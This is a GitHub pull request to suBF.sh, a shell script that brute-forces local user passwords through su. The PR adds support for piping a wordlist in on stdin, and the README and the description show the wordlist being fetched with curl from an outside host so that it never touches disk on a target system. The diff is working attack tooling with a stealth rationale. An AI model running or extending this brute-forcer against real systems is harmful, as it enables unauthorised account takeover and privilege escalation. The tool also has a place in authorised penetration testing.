### PR TITLE
 Add support to read wordlist from pipe

### DIFF
--- a/README.md
+++ b/README.md
@@ -12,3 +12,10 @@ You can configure these times using `-t` (timeout `su` process) and `-s` (sleep 
 ```
 ./suBF.sh -u <USERNAME> [-w top12000.txt]  [-t 0.7] [-s 0.007]
 ```
+
+In addition to files, you can **pipe the output from other commands** to provide the wordlist, examples:
+
+```bash
+curl -s http://10.10.10.10/wordlist.txt | ./suBF.sh -u <USERNAME> -w -
+seq 0 1000 | ./suBF.sh -u <USERNAME> -w -
+``` 

--- a/suBF.sh
+++ b/suBF.sh
@@ -26,8 +26,7 @@ done
 
 if ! [ "$USER" ]; then printf "$help"; exit 0; fi
 
-
-if ! [ -f "$WORDLIST" ]; then echo "Wordlist ($WORDLIST) not found!"; exit 0; fi
+if ! [[ -p /dev/stdin ]] && ! [ $WORDLIST = "-" ] && ! [ -f "$WORDLIST" ]; then echo "Wordlist ($WORDLIST) not found!"; exit 0; fi
 
 C=$(printf '\033')
 
@@ -48,12 +47,19 @@ su_brute_user_num (){
   su_try_pwd $USER $USER & #Try username as password
   su_try_pwd $USER `echo $USER | rev 2>/dev/null` &     #Try reverse username as password
 
-  while IFS='' read -r P || [ -n "${P}" ]; do # Loop through wordlist file
-    su_try_pwd $USER $P & #Try TOP TRIES of passwords (by default 2000)
-    sleep $SLEEPPROC # To not overload the system
-  done < $WORDLIST
+  if ! [[ -p /dev/stdin ]] && [ -f "$WORDLIST" ]; then
+    while IFS='' read -r P || [ -n "${P}" ]; do # Loop through wordlist file   
+      su_try_pwd $USER $P & #Try TOP TRIES of passwords (by default 2000)
+      sleep $SLEEPPROC # To not overload the system
+    done < $WORDLIST
 
-
+  else
+    cat - | while read line; do
+      su_try_pwd $USER $line & #Try TOP TRIES of passwords (by default 2000)    
+      sleep $SLEEPPROC # To not overload the system
+    done
+  fi
+    echo "  Wordlist exhausted, any password found for user $USER" | sed "s,.*,${C}[1;31;107m&${C}[0m,"
   wait
 }
 

--- a/suBF.sh
+++ b/suBF.sh
@@ -59,8 +59,8 @@ su_brute_user_num (){
       sleep $SLEEPPROC # To not overload the system
     done
   fi
-    echo "  Wordlist exhausted, any password found for user $USER" | sed "s,.*,${C}[1;31;107m&${C}[0m,"
   wait
 }
 
 su_brute_user_num $USER
+echo "  Wordlist exhausted" | sed "s,.*,${C}[1;31;107m&${C}[0m,"


### PR DESCRIPTION
Hello!

I have add support to read the wordlists from pipe, so, in addition to the possibility to provide it via file, we could provide wordlists like this:

```shell
curl -s http://10.10.10.10/wordlist.txt | ./suBF.sh -u example -w -
seq 0 1000 | ./suBF.sh -u example -w -
```

It would allow more flexibility, also delete the requirement to have the wordlist written into disk (useful when trying to bruteforce on a target system and dont want to download the wordlist).

I also improved verbosity informing user when no found any suitable password:

![image](https://user-images.githubusercontent.com/25709767/209979355-a82d385f-480c-4096-9be6-91cb9282537b.png)

